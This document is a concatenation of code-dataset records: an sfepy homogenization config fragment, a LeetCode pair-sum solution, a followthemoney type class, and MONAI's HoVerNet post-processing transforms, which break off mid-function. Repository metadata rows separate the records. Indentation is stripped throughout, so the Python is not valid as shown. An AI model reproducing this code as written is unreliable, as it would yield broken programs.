def set_elastic(variables, ir, ic, mode, pis, corrs_rs):
mode2var = {'row' : 'Pi1', 'col' : 'Pi2'}
val = pis.states[ir, ic]['u'] + corrs_rs.states[ir, ic]['u']
variables[mode2var[mode]].set_data(val)
coefs = {
'D' : {
'requires' : ['pis', 'corrs_rs'],
'expression' : expr_coefs,
'set_variables' : set_elastic,
'class' : cb.CoefSymSym,
},
'filenames' : {},
}
requirements = {
'pis' : {
'variables' : ['u'],
'class' : cb.ShapeDimDim,
},
'corrs_rs' : {
'requires' : ['pis'],
'ebcs' : ['fixed_u'],
'epbcs' : all_periodic,
'equations' : equation_corrs,
'set_variables' : [('Pi', 'pis', 'u')],
'class' : cb.CorrDimDim,
'save_name' : 'corrs_le',
'dump_variables' : ['u'],
},
}
#! Solvers
#! -------
#! Define linear and nonlinear solver.
solvers = {
'ls' : ('ls.umfpack', {}),
'newton' : ('nls.newton', {'i_max' : 1,
'eps_a' : 1e-4,
'problem' : 'nonlinear',
})
}
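#! Running the example
#! -------------------
#! A sketch of how such an input is typically run (the script name and paths
#! may differ between sfepy versions):
#!
#! $ ./homogen.py examples/homogenization/linear_homogenization.py
#!
#! This computes the correctors and the homogenized elasticity tensor ``D``,
#! writing the coefficients to ``output/coefs_le`` as set in ``options`` above.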
| [
"[email protected]"
]
| |
7b96f4da183d09e021d9952a0dcf54bf9f5af32f | c898af4efbfaeba8fa91d86bc97f7f6ee2381564 | /easy/561. Array Partition I/test.py | e9fa5a72142fdad8d3321c524413f6509e273cb4 | []
| no_license | weiweiECNU/leetcode | 5941300131e41614ccc043cc94ba5c03e4342165 | 1c817338f605f84acb9126a002c571dc5e28a4f7 | refs/heads/master | 2020-06-20T18:33:28.157763 | 2019-08-20T07:52:14 | 2019-08-20T07:52:14 | 197,209,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | # https://leetcode.com/problems/array-partition-i/
# Larger numbers must be paired with other large numbers; otherwise each
# pair's min() is dragged down by the smaller partner.
# So sort first, then take the first (smaller) element of every consecutive pair.
# Time complexity is O(N log N); space is O(N), since sorted() returns a new list.
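# Worked example (illustrative): nums = [1, 4, 3, 2]
#   sorted(nums)        -> [1, 2, 3, 4]
#   pairs (1,2), (3,4)  -> sum of mins: 1 + 3 = 4
#   sorted(nums)[::2]   -> [1, 3], sum(...) = 4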
class Solution:
def arrayPairSum(self, nums: List[int]) -> int:
return sum(sorted(nums)[::2]) | [
"[email protected]"
]
| |
e05664ff87e83f760833b263ea27a3411e4d24e3 | ca446c7e21cd1fb47a787a534fe308203196ef0d | /followthemoney/types/number.py | 4072e01a3017fa934f2ce8208185ed2b55969689 | [
"MIT"
]
| permissive | critocrito/followthemoney | 1a37c277408af504a5c799714e53e0f0bd709f68 | bcad19aedc3b193862018a3013a66869e115edff | refs/heads/master | 2020-06-12T09:56:13.867937 | 2019-06-28T08:23:54 | 2019-06-28T08:23:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | from followthemoney.types.common import PropertyType
from followthemoney.util import defer as _
class NumberType(PropertyType):
name = 'number'
label = _('Number')
plural = _('Numbers')
matchable = False
| [
"[email protected]"
]
| |
5554901defcf910a7eb1e706f39e14f5d12a7f72 | 5dccb539427d6bd98b4b4eab38b524dc930229c7 | /monai/apps/pathology/transforms/post/array.py | 5289dc101cbcd35a1374ebbfa721ba2ba02f1d52 | [
"Apache-2.0"
]
| permissive | Warvito/MONAI | 794aca516e6b3ed365ee912164743a3696735cf3 | 8eceabf281ab31ea4bda0ab8a6d2c8da06027e82 | refs/heads/dev | 2023-04-27T19:07:56.041733 | 2023-03-27T09:23:53 | 2023-03-27T09:23:53 | 512,893,750 | 0 | 0 | Apache-2.0 | 2022-08-05T16:51:05 | 2022-07-11T20:04:47 | null | UTF-8 | Python | false | false | 36,850 | py | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import warnings
from typing import Callable, Sequence
import numpy as np
import torch
from monai.config.type_definitions import DtypeLike, NdarrayOrTensor
from monai.transforms import (
Activations,
AsDiscrete,
BoundingRect,
FillHoles,
GaussianSmooth,
RemoveSmallObjects,
SobelGradients,
)
from monai.transforms.transform import Transform
from monai.transforms.utils_pytorch_numpy_unification import max, maximum, min, sum, unique
from monai.utils import TransformBackends, convert_to_numpy, optional_import
from monai.utils.misc import ensure_tuple_rep
from monai.utils.type_conversion import convert_to_dst_type
label, _ = optional_import("scipy.ndimage.measurements", name="label")
disk, _ = optional_import("skimage.morphology", name="disk")
opening, _ = optional_import("skimage.morphology", name="opening")
watershed, _ = optional_import("skimage.segmentation", name="watershed")
find_contours, _ = optional_import("skimage.measure", name="find_contours")
centroid, _ = optional_import("skimage.measure", name="centroid")
__all__ = [
"Watershed",
"GenerateWatershedMask",
"GenerateInstanceBorder",
"GenerateDistanceMap",
"GenerateWatershedMarkers",
"GenerateSuccinctContour",
"GenerateInstanceContour",
"GenerateInstanceCentroid",
"GenerateInstanceType",
"HoVerNetInstanceMapPostProcessing",
"HoVerNetNuclearTypePostProcessing",
]
class Watershed(Transform):
"""
Use `skimage.segmentation.watershed` to get instance segmentation results from images.
See: https://scikit-image.org/docs/stable/api/skimage.segmentation.html#skimage.segmentation.watershed.
Args:
connectivity: an array with the same number of dimensions as image whose non-zero elements indicate
neighbors for connection. Following the scipy convention, default is a one-connected array of
the dimension of the image.
dtype: target data content type to convert, default is np.int64.
"""
backend = [TransformBackends.NUMPY]
def __init__(self, connectivity: int | None = 1, dtype: DtypeLike = np.int64) -> None:
self.connectivity = connectivity
self.dtype = dtype
def __call__(
self, image: NdarrayOrTensor, mask: NdarrayOrTensor | None = None, markers: NdarrayOrTensor | None = None
) -> NdarrayOrTensor:
"""
Args:
image: image where the lowest value points are labeled first. Shape must be [1, H, W, [D]].
mask: optional, the same shape as image. Only points at which mask == True will be labeled.
If None (no mask given), it is a volume of all 1s.
markers: optional, the same shape as image. The desired number of markers, or an array marking
the basins with the values to be assigned in the label matrix. Zero means not a marker.
If None (no markers given), the local minima of the image are used as markers.
"""
image = convert_to_numpy(image)
markers = convert_to_numpy(markers)
mask = convert_to_numpy(mask)
instance_seg = watershed(image, markers=markers, mask=mask, connectivity=self.connectivity)
return convert_to_dst_type(instance_seg, image, dtype=self.dtype)[0]
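# Usage sketch (illustrative shapes and values): label basins of a distance map.
# In the HoVerNet pipeline, `dist`, `mask` and `markers` would come from
# GenerateDistanceMap, GenerateWatershedMask and GenerateWatershedMarkers below.
#
#     import numpy as np
#     dist = -np.random.rand(1, 64, 64).astype(np.float32)  # stand-in distance map
#     inst_map = Watershed(connectivity=1)(dist)  # [1, 64, 64] int64 instance labels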
class GenerateWatershedMask(Transform):
"""
generate mask used in `watershed`. Only points at which mask == True will be labeled.
Args:
activation: the activation layer to be applied on the input probability map.
It can be "softmax" or "sigmoid" string, or any callable. Defaults to "softmax".
threshold: an optional float value to threshold to binarize probability map.
If not provided, defaults to 0.5 when activation is not "softmax", otherwise None.
min_object_size: objects smaller than this size (in pixel) are removed. Defaults to 10.
dtype: target data content type to convert, default is np.uint8.
"""
backend = [TransformBackends.NUMPY]
def __init__(
self,
activation: str | Callable = "softmax",
threshold: float | None = None,
min_object_size: int = 10,
dtype: DtypeLike = np.uint8,
) -> None:
self.dtype = dtype
# set activation layer
use_softmax = False
use_sigmoid = False
activation_fn = None
if isinstance(activation, str):
if activation.lower() == "softmax":
use_softmax = True
elif activation.lower() == "sigmoid":
use_sigmoid = True
else:
raise ValueError(
f"The activation should be 'softmax' or 'sigmoid' string, or any callable. '{activation}' was given."
)
elif callable(activation):
activation_fn = activation
else:
raise ValueError(f"The activation type should be either str or callable. '{type(activation)}' was given.")
self.activation = Activations(softmax=use_softmax, sigmoid=use_sigmoid, other=activation_fn)
# set discretization transform
if not use_softmax and threshold is None:
threshold = 0.5
self.as_discrete = AsDiscrete(threshold=threshold, argmax=use_softmax)
# set small object removal transform
self.remove_small_objects = RemoveSmallObjects(min_size=min_object_size) if min_object_size > 0 else None
def __call__(self, prob_map: NdarrayOrTensor) -> NdarrayOrTensor:
"""
Args:
prob_map: probability map of segmentation, shape must be [C, H, W, [D]]
"""
pred = self.activation(prob_map)
pred = self.as_discrete(pred)
pred = convert_to_numpy(pred)
pred = label(pred)[0]
if self.remove_small_objects is not None:
pred = self.remove_small_objects(pred)
pred[pred > 0] = 1 # type: ignore
return convert_to_dst_type(pred, prob_map, dtype=self.dtype)[0]
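# Usage sketch (illustrative): binarize raw 2-channel logits into a foreground
# mask; the transform applies softmax, argmax and small-object removal itself.
#
#     import torch
#     logits = torch.randn(2, 64, 64)  # [C, H, W] network output
#     mask = GenerateWatershedMask(activation="softmax")(logits)  # [1, 64, 64] uint8 in {0, 1}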
class GenerateInstanceBorder(Transform):
"""
Generate an instance border map from the hover map. Pixels that are harder to identify as
foreground receive larger grey-scale values, so the instance borders carry the largest values.
Args:
kernel_size: the size of the Sobel kernel. Defaults to 5.
dtype: target data type to convert to. Defaults to np.float32.
Raises:
ValueError: when the `mask` shape is not [1, H, W].
ValueError: when the `hover_map` shape is not [2, H, W].
"""
backend = [TransformBackends.NUMPY]
def __init__(self, kernel_size: int = 5, dtype: DtypeLike = np.float32) -> None:
self.dtype = dtype
self.sobel_gradient = SobelGradients(kernel_size=kernel_size)
def __call__(self, mask: NdarrayOrTensor, hover_map: NdarrayOrTensor) -> NdarrayOrTensor: # type: ignore
"""
Args:
mask: binary segmentation map, the output of :py:class:`GenerateWatershedMask`.
Shape must be [1, H, W] or [H, W].
hover_map: horizontal and vertical distances of nuclear pixels to their centres of mass. Shape must be [2, H, W].
The first and second channel represent the horizontal and vertical maps respectively. For more details refer
to papers: https://arxiv.org/abs/1812.06499.
"""
if len(hover_map.shape) != 3:
raise ValueError(f"The hover map should have the shape of [C, H, W], but got {hover_map.shape}.")
if len(mask.shape) == 3:
if mask.shape[0] != 1:
raise ValueError(f"The mask should have only one channel, but got {mask.shape[0]}.")
elif len(mask.shape) == 2:
mask = mask[None]
else:
raise ValueError(f"The mask should have the shape of [1, H, W] or [H, W], but got {mask.shape}.")
if hover_map.shape[0] != 2:
raise ValueError(f"Suppose the hover map only has two channels, but got {hover_map.shape[0]}")
hover_h = hover_map[0:1, ...]
hover_v = hover_map[1:2, ...]
hover_h_min, hover_h_max = min(hover_h), max(hover_h)
hover_v_min, hover_v_max = min(hover_v), max(hover_v)
if (hover_h_max - hover_h_min) == 0 or (hover_v_max - hover_v_min) == 0:
raise ValueError("Not a valid hover map, please check your input")
hover_h = (hover_h - hover_h_min) / (hover_h_max - hover_h_min)
hover_v = (hover_v - hover_v_min) / (hover_v_max - hover_v_min)
sobelh = self.sobel_gradient(hover_h)[1, ...]
sobelv = self.sobel_gradient(hover_v)[0, ...]
sobelh_min, sobelh_max = min(sobelh), max(sobelh)
sobelv_min, sobelv_max = min(sobelv), max(sobelv)
if (sobelh_max - sobelh_min) == 0 or (sobelv_max - sobelv_min) == 0:
raise ValueError("Not a valid sobel gradient map")
sobelh = 1 - (sobelh - sobelh_min) / (sobelh_max - sobelh_min)
sobelv = 1 - (sobelv - sobelv_min) / (sobelv_max - sobelv_min)
# combine the h & v values using max
overall = maximum(sobelh, sobelv)
overall = overall - (1 - mask)
overall[overall < 0] = 0
return convert_to_dst_type(overall, mask, dtype=self.dtype)[0]
class GenerateDistanceMap(Transform):
"""
Generate distance map.
In general, the instance map is calculated from the distance to the background.
Here, we use 1 - "instance border map" to generate the distance map.
Nuclei values form mountains so invert them to get basins.
Args:
smooth_fn: smoothing function for distance map, which can be any callable object.
If not provided :py:class:`monai.transforms.GaussianSmooth()` is used.
dtype: target data type to convert to. Defaults to np.float32.
"""
backend = [TransformBackends.NUMPY]
def __init__(self, smooth_fn: Callable | None = None, dtype: DtypeLike = np.float32) -> None:
self.smooth_fn = smooth_fn if smooth_fn is not None else GaussianSmooth()
self.dtype = dtype
def __call__(self, mask: NdarrayOrTensor, instance_border: NdarrayOrTensor) -> NdarrayOrTensor: # type: ignore
"""
Args:
mask: binary segmentation map, the output of :py:class:`GenerateWatershedMask`.
Shape must be [1, H, W] or [H, W].
instance_border: instance border map, the output of :py:class:`GenerateInstanceBorder`.
Shape must be [1, H, W].
"""
if len(mask.shape) == 3:
if mask.shape[0] != 1:
raise ValueError(f"The mask should have only one channel, but got {mask.shape[0]}.")
elif len(mask.shape) == 2:
mask = mask[None]
else:
raise ValueError(f"The mask should have the shape of [1, H, W] or [H, W], but got {mask.shape}.")
if instance_border.shape[0] != 1 or instance_border.ndim != 3:
raise ValueError(f"Input instance_border should be with size of [1, H, W], but got {instance_border.shape}")
distance_map = (1.0 - instance_border) * mask
distance_map = self.smooth_fn(distance_map) # type: ignore
return convert_to_dst_type(-distance_map, mask, dtype=self.dtype)[0]
class GenerateWatershedMarkers(Transform):
"""
Generate markers to be used in `watershed`. The watershed algorithm treats pixels values as a local topography
(elevation). The algorithm floods basins from the markers until basins attributed to different markers meet on
watershed lines. Generally, markers are chosen as local minima of the image, from which basins are flooded.
Here is the implementation from HoVerNet paper.
For more details refer to papers: https://arxiv.org/abs/1812.06499.
Args:
threshold: a float value to threshold to binarize instance border map.
It turns uncertain area to 1 and other area to 0. Defaults to 0.4.
radius: the radius of the disk-shaped footprint used in `opening`. Defaults to 2.
min_object_size: objects smaller than this size (in pixel) are removed. Defaults to 10.
postprocess_fn: additional post-process function on the markers.
If not provided, :py:class:`monai.transforms.post.FillHoles()` will be used.
dtype: target data type to convert to. Defaults to np.int64.
"""
backend = [TransformBackends.NUMPY]
def __init__(
self,
threshold: float = 0.4,
radius: int = 2,
min_object_size: int = 10,
postprocess_fn: Callable | None = None,
dtype: DtypeLike = np.int64,
) -> None:
self.threshold = threshold
self.radius = radius
self.dtype = dtype
if postprocess_fn is None:
postprocess_fn = FillHoles()
self.postprocess_fn = postprocess_fn
self.remove_small_objects = RemoveSmallObjects(min_size=min_object_size) if min_object_size > 0 else None
def __call__(self, mask: NdarrayOrTensor, instance_border: NdarrayOrTensor) -> NdarrayOrTensor: # type: ignore
"""
Args:
mask: binary segmentation map, the output of :py:class:`GenerateWatershedMask`.
Shape must be [1, H, W] or [H, W].
instance_border: instance border map, the output of :py:class:`GenerateInstanceBorder`.
Shape must be [1, H, W].
"""
if len(mask.shape) == 3:
if mask.shape[0] != 1:
raise ValueError(f"The mask should have only one channel, but got {mask.shape[0]}.")
elif len(mask.shape) == 2:
mask = mask[None]
else:
raise ValueError(f"The mask should have the shape of [1, H, W] or [H, W], but got {mask.shape}.")
if instance_border.shape[0] != 1 or instance_border.ndim != 3:
raise ValueError(f"Input instance_border should be with size of [1, H, W], but got {instance_border.shape}")
instance_border = instance_border >= self.threshold # uncertain area
marker = mask - convert_to_dst_type(instance_border, mask)[0] # certain foreground
marker[marker < 0] = 0 # type: ignore
marker = self.postprocess_fn(marker)
marker = convert_to_numpy(marker)
marker = opening(marker.squeeze(), disk(self.radius))
marker = label(marker)[0][None]
if self.remove_small_objects is not None:
marker = self.remove_small_objects(marker)
return convert_to_dst_type(marker, mask, dtype=self.dtype)[0]
class GenerateSuccinctContour(Transform):
"""
Converts SciPy-style contours (generated by skimage.measure.find_contours) to a more succinct version which only includes
the pixels to which lines need to be drawn (i.e. not the intervening pixels along each line).
Args:
height: height of bounding box, used to detect direction of line segment.
width: width of bounding box, used to detect direction of line segment.
Returns:
the pixels that need to be joined by straight lines to describe the outmost pixels of the foreground similar to
OpenCV's cv.CHAIN_APPROX_SIMPLE (counterclockwise)
"""
def __init__(self, height: int, width: int) -> None:
self.height = height
self.width = width
def _generate_contour_coord(self, current: np.ndarray, previous: np.ndarray) -> tuple[int, int]:
"""
Generate contour coordinates. Given the previous and current coordinates of border positions,
returns the int pixel that marks the extremity of the segmented pixels.
Args:
current: coordinates of the current border position.
previous: coordinates of the previous border position.
"""
p_delta = (current[0] - previous[0], current[1] - previous[1])
if p_delta in ((0.0, 1.0), (0.5, 0.5), (1.0, 0.0)):
row = int(current[0] + 0.5)
col = int(current[1])
elif p_delta in ((0.0, -1.0), (0.5, -0.5)):
row = int(current[0])
col = int(current[1])
elif p_delta in ((-1, 0.0), (-0.5, -0.5)):
row = int(current[0])
col = int(current[1] + 0.5)
elif p_delta == (-0.5, 0.5):
row = int(current[0] + 0.5)
col = int(current[1] + 0.5)
return row, col
def _calculate_distance_from_top_left(self, sequence: Sequence[tuple[int, int]]) -> int:
"""
Each sequence of coordinates describes a boundary between foreground and background starting and ending at two sides
of the bounding box. To order the sequences correctly, we compute the distance from the top-left of the bounding box
around the perimeter in a clockwise direction.
Args:
sequence: list of border points coordinates.
Returns:
the distance round the perimeter of the bounding box from the top-left origin
"""
distance: int
first_coord = sequence[0]
if first_coord[0] == 0:
distance = first_coord[1]
elif first_coord[1] == self.width - 1:
distance = self.width + first_coord[0]
elif first_coord[0] == self.height - 1:
distance = 2 * self.width + self.height - first_coord[1]
else:
distance = 2 * (self.width + self.height) - first_coord[0]
return distance
def __call__(self, contours: list[np.ndarray]) -> np.ndarray:
"""
Args:
contours: list of (n, 2)-ndarrays, scipy-style clockwise line segments, with lines separating foreground/background.
Each contour is an ndarray of shape (n, 2), consisting of n (row, column) coordinates along the contour.
"""
pixels: list[tuple[int, int]] = []
sequences = []
corners = [False, False, False, False]
for group in contours:
sequence: list[tuple[int, int]] = []
last_added = None
prev = None
corner = -1
for i, coord in enumerate(group):
if i == 0:
# originating from the top, so must be heading south east
if coord[0] == 0.0:
corner = 1
pixel = (0, int(coord[1] - 0.5))
if pixel[1] == self.width - 1:
corners[1] = True
elif pixel[1] == 0.0:
corners[0] = True
# originating from the left, so must be heading north east
elif coord[1] == 0.0:
corner = 0
pixel = (int(coord[0] + 0.5), 0)
# originating from the bottom, so must be heading north west
elif coord[0] == self.height - 1:
corner = 3
pixel = (int(coord[0]), int(coord[1] + 0.5))
if pixel[1] == self.width - 1:
corners[2] = True
# originating from the right, so must be heading south west
elif coord[1] == self.width - 1:
corner = 2
pixel = (int(coord[0] - 0.5), int(coord[1]))
else:
warnings.warn(f"Invalid contour coord {coord} is generated, skip this instance.")
return None # type: ignore
sequence.append(pixel)
last_added = pixel
elif i == len(group) - 1:
# add this point
pixel = self._generate_contour_coord(coord, prev) # type: ignore
if pixel != last_added:
sequence.append(pixel)
last_added = pixel
elif np.any(coord - prev != group[i + 1] - coord):
pixel = self._generate_contour_coord(coord, prev) # type: ignore
if pixel != last_added:
sequence.append(pixel)
last_added = pixel
# flag whether each corner has been crossed
if i == len(group) - 1:
if corner == 0:
if coord[0] == 0:
corners[corner] = True
elif corner == 1:
if coord[1] == self.width - 1:
corners[corner] = True
elif corner == 2:
if coord[0] == self.height - 1:
corners[corner] = True
elif corner == 3:
if coord[1] == 0.0:
corners[corner] = True
prev = coord
dist = self._calculate_distance_from_top_left(sequence)
sequences.append({"distance": dist, "sequence": sequence})
# check whether we need to insert any missing corners
if corners[0] is False:
sequences.append({"distance": 0, "sequence": [(0, 0)]})
if corners[1] is False:
sequences.append({"distance": self.width, "sequence": [(0, self.width - 1)]})
if corners[2] is False:
sequences.append({"distance": self.width + self.height, "sequence": [(self.height - 1, self.width - 1)]})
if corners[3] is False:
sequences.append({"distance": 2 * self.width + self.height, "sequence": [(self.height - 1, 0)]})
# join the sequences into a single contour
# starting at top left and rotating clockwise
sequences.sort(key=lambda x: x.get("distance")) # type: ignore
last = (-1, -1)
for _sequence in sequences:
if _sequence["sequence"][0] == last: # type: ignore
pixels.pop()
if pixels:
pixels = [*pixels, *_sequence["sequence"]] # type: ignore
else:
pixels = _sequence["sequence"] # type: ignore
last = pixels[-1]
if pixels[0] == last:
pixels.pop(0)
if pixels[0] == (0, 0):
pixels.append(pixels.pop(0))
return np.flip(convert_to_numpy(pixels, dtype=np.int32)) # type: ignore
class GenerateInstanceContour(Transform):
"""
Generate contour for each instance in a 2D array. Use `GenerateSuccinctContour` to only include
the pixels to which lines need to be drawn
Args:
min_num_points: contours containing fewer points than this value are discarded as
not forming a valid contour. Defaults to 3.
contour_level: an optional value for `skimage.measure.find_contours` to find contours in the array.
If not provided, the level is set to `(max(image) + min(image)) / 2`.
"""
backend = [TransformBackends.NUMPY]
def __init__(self, min_num_points: int = 3, contour_level: float | None = None) -> None:
self.contour_level = contour_level
self.min_num_points = min_num_points
def __call__(self, inst_mask: NdarrayOrTensor, offset: Sequence[int] | None = (0, 0)) -> np.ndarray | None:
"""
Args:
inst_mask: segmentation mask for a single instance. Shape should be [1, H, W, [D]]
offset: optional offset of starting position of the instance mask in the original array. Default to 0 for each dim.
"""
inst_mask = inst_mask.squeeze() # squeeze channel dim
inst_mask = convert_to_numpy(inst_mask)
inst_contour_cv = find_contours(inst_mask, level=self.contour_level)
generate_contour = GenerateSuccinctContour(inst_mask.shape[0], inst_mask.shape[1])
inst_contour = generate_contour(inst_contour_cv)
if inst_contour is None:
return None
# less than `self.min_num_points` points don't make a contour, so skip.
# They are likely to be artifacts as the contours obtained via approximation.
if inst_contour.shape[0] < self.min_num_points:
print(f"< {self.min_num_points} points don't make a contour, so skipped!")
return None
# check for tricky shape
elif len(inst_contour.shape) != 2:
print(f"{len(inst_contour.shape)} != 2, check for tricky shapes!")
return None
else:
inst_contour[:, 0] += offset[0] # type: ignore
inst_contour[:, 1] += offset[1] # type: ignore
return inst_contour
class GenerateInstanceCentroid(Transform):
"""
Generate instance centroid using `skimage.measure.centroid`.
Args:
dtype: the data type of output centroid.
"""
backend = [TransformBackends.NUMPY]
def __init__(self, dtype: DtypeLike | None = int) -> None:
self.dtype = dtype
def __call__(self, inst_mask: NdarrayOrTensor, offset: Sequence[int] | int = 0) -> NdarrayOrTensor:
"""
Args:
inst_mask: segmentation mask for a single instance. Shape should be [1, H, W, [D]]
offset: optional offset of starting position of the instance mask in the original array. Default to 0 for each dim.
"""
inst_mask = convert_to_numpy(inst_mask)
inst_mask = inst_mask.squeeze(0) # squeeze channel dim
ndim = len(inst_mask.shape)
offset = ensure_tuple_rep(offset, ndim)
inst_centroid = centroid(inst_mask)
for i in range(ndim):
inst_centroid[i] += offset[i]
return convert_to_dst_type(inst_centroid, inst_mask, dtype=self.dtype)[0]
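# Usage sketch (illustrative): centroid of a single-instance crop, shifted by
# the crop offset so the coordinates refer back to the original image.
#
#     import numpy as np
#     inst = np.zeros((1, 8, 8)); inst[0, 2:6, 2:6] = 1
#     GenerateInstanceCentroid()(inst, offset=(10, 20))  # -> array([13, 23])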
class GenerateInstanceType(Transform):
"""
Generate instance type and probability for each instance.
"""
backend = [TransformBackends.NUMPY]
def __call__( # type: ignore
self, type_pred: NdarrayOrTensor, seg_pred: NdarrayOrTensor, bbox: np.ndarray, instance_id: int
) -> tuple[int, float]:
"""
Args:
type_pred: pixel-level type prediction map after activation function.
seg_pred: pixel-level segmentation prediction map after activation function.
bbox: bounding box coordinates of the instance, shape is [channel, 2 * spatial dims].
instance_id: get instance type from specified instance id.
"""
rmin, rmax, cmin, cmax = bbox.flatten()
seg_map_crop = seg_pred[0, rmin:rmax, cmin:cmax]
type_map_crop = type_pred[0, rmin:rmax, cmin:cmax]
seg_map_crop = convert_to_dst_type(seg_map_crop == instance_id, type_map_crop, dtype=bool)[0]
inst_type = type_map_crop[seg_map_crop] # type: ignore
type_list, type_pixels = unique(inst_type, return_counts=True)
type_list = list(zip(type_list, type_pixels))
type_list = sorted(type_list, key=lambda x: x[1], reverse=True) # type: ignore
inst_type = type_list[0][0]
if inst_type == 0:  # ! pick the 2nd most dominant type if it exists
if len(type_list) > 1:
inst_type = type_list[1][0]
type_dict = {v[0]: v[1] for v in type_list}
type_prob = type_dict[inst_type] / (sum(seg_map_crop) + 1.0e-6)
return (int(inst_type), float(type_prob))
class HoVerNetInstanceMapPostProcessing(Transform):
"""
The post-processing transform for HoVerNet model to generate instance segmentation map.
It generates an instance segmentation map as well as a dictionary containing centroids, bounding boxes, and contours
for each instance.
Args:
activation: the activation layer to be applied on the input probability map.
It can be "softmax" or "sigmoid" string, or any callable. Defaults to "softmax".
mask_threshold: a float value to threshold to binarize probability map to generate mask.
min_object_size: objects smaller than this size (in pixel) are removed. Defaults to 10.
sobel_kernel_size: the size of the Sobel kernel used in :py:class:`GenerateInstanceBorder`. Defaults to 5.
distance_smooth_fn: smoothing function for distance map.
If not provided, :py:class:`monai.transforms.intensity.GaussianSmooth()` will be used.
marker_threshold: a float value to threshold to binarize instance border map for markers.
It turns uncertain area to 1 and other area to 0. Defaults to 0.4.
marker_radius: the radius of the disk-shaped footprint used in `opening` of markers. Defaults to 2.
marker_postprocess_fn: post-process function for watershed markers.
If not provided, :py:class:`monai.transforms.post.FillHoles()` will be used.
watershed_connectivity: `connectivity` argument of `skimage.segmentation.watershed`.
min_num_points: minimum number of points to be considered as a contour. Defaults to 3.
contour_level: an optional value for `skimage.measure.find_contours` to find contours in the array.
If not provided, the level is set to `(max(image) + min(image)) / 2`.
"""
def __init__(
self,
activation: str | Callable = "softmax",
mask_threshold: float | None = None,
min_object_size: int = 10,
sobel_kernel_size: int = 5,
distance_smooth_fn: Callable | None = None,
marker_threshold: float = 0.4,
marker_radius: int = 2,
marker_postprocess_fn: Callable | None = None,
watershed_connectivity: int | None = 1,
min_num_points: int = 3,
contour_level: float | None = None,
) -> None:
super().__init__()
self.generate_watershed_mask = GenerateWatershedMask(
activation=activation, threshold=mask_threshold, min_object_size=min_object_size
)
self.generate_instance_border = GenerateInstanceBorder(kernel_size=sobel_kernel_size)
self.generate_distance_map = GenerateDistanceMap(smooth_fn=distance_smooth_fn)
self.generate_watershed_markers = GenerateWatershedMarkers(
threshold=marker_threshold,
radius=marker_radius,
postprocess_fn=marker_postprocess_fn,
min_object_size=min_object_size,
)
self.watershed = Watershed(connectivity=watershed_connectivity)
self.generate_instance_contour = GenerateInstanceContour(
min_num_points=min_num_points, contour_level=contour_level
)
self.generate_instance_centroid = GenerateInstanceCentroid()
def __call__( # type: ignore
self, nuclear_prediction: NdarrayOrTensor, hover_map: NdarrayOrTensor
) -> tuple[dict, NdarrayOrTensor]:
"""post-process instance segmentation branches (NP and HV) to generate instance segmentation map.
Args:
nuclear_prediction: the output of NP (nuclear prediction) branch of HoVerNet model
hover_map: the output of HV (hover map) branch of HoVerNet model
"""
# Process NP and HV branch using watershed algorithm
watershed_mask = self.generate_watershed_mask(nuclear_prediction)
instance_borders = self.generate_instance_border(watershed_mask, hover_map)
distance_map = self.generate_distance_map(watershed_mask, instance_borders)
watershed_markers = self.generate_watershed_markers(watershed_mask, instance_borders)
instance_map = self.watershed(distance_map, watershed_mask, watershed_markers)
# Create bounding boxes, contours and centroids
instance_ids = set(np.unique(instance_map)) - {0} # exclude background
instance_info = {}
for inst_id in instance_ids:
instance_mask = instance_map == inst_id
instance_bbox = BoundingRect()(instance_mask)
instance_mask = instance_mask[
:, instance_bbox[0][0] : instance_bbox[0][1], instance_bbox[0][2] : instance_bbox[0][3]
]
offset = [instance_bbox[0][2], instance_bbox[0][0]]
instance_contour = self.generate_instance_contour(FillHoles()(instance_mask), offset)
if instance_contour is not None:
instance_centroid = self.generate_instance_centroid(instance_mask, offset)
instance_info[inst_id] = {
"bounding_box": instance_bbox,
"centroid": instance_centroid,
"contour": instance_contour,
}
return instance_info, instance_map
class HoVerNetNuclearTypePostProcessing(Transform):
"""
The post-processing transform for HoVerNet model to generate nuclear type information.
It updates the input instance info dictionary with information about types of the nuclei (value and probability).
Also if requested (`return_type_map=True`), it generates a pixel-level type map.
Args:
activation: the activation layer to be applied on nuclear type branch. It can be "softmax" or "sigmoid" string,
or any callable. Defaults to "softmax".
threshold: an optional float value to threshold to binarize probability map.
If not provided, defaults to 0.5 when activation is not "softmax", otherwise None.
return_type_map: whether to calculate and return pixel-level type map.
"""
def __init__(
self, activation: str | Callable = "softmax", threshold: float | None = None, return_type_map: bool = True
) -> None:
super().__init__()
self.return_type_map = return_type_map
self.generate_instance_type = GenerateInstanceType()
# set activation layer
use_softmax = False
use_sigmoid = False
activation_fn = None
if isinstance(activation, str):
if activation.lower() == "softmax":
use_softmax = True
elif activation.lower() == "sigmoid":
use_sigmoid = True
else:
raise ValueError(
f"The activation should be 'softmax' or 'sigmoid' string, or any callable. '{activation}' was given."
)
elif callable(activation):
activation_fn = activation
else:
raise ValueError(f"The activation type should be either str or callable. '{type(activation)}' was given.")
self.activation = Activations(softmax=use_softmax, sigmoid=use_sigmoid, other=activation_fn)
# set discretization transform
if not use_softmax and threshold is None:
threshold = 0.5
self.as_discrete = AsDiscrete(threshold=threshold, argmax=use_softmax)
def __call__( # type: ignore
self, type_prediction: NdarrayOrTensor, instance_info: dict[int, dict], instance_map: NdarrayOrTensor
) -> tuple[dict, NdarrayOrTensor | None]:
"""Process NC (type prediction) branch and combine it with instance segmentation
It updates the instance_info with instance type and associated probability, and generate instance type map.
Args:
instance_info: instance information dictionary, the output of :py:class:`HoVerNetInstanceMapPostProcessing`
instance_map: instance segmentation map, the output of :py:class:`HoVerNetInstanceMapPostProcessing`
type_prediction: the output of NC (type prediction) branch of HoVerNet model
"""
type_prediction = self.activation(type_prediction)
type_prediction = self.as_discrete(type_prediction)
type_map = None
if self.return_type_map:
type_map = convert_to_dst_type(torch.zeros(instance_map.shape), instance_map)[0]
for inst_id in instance_info:
instance_type, instance_type_prob = self.generate_instance_type(
type_pred=type_prediction,
seg_pred=instance_map,
bbox=instance_info[inst_id]["bounding_box"],
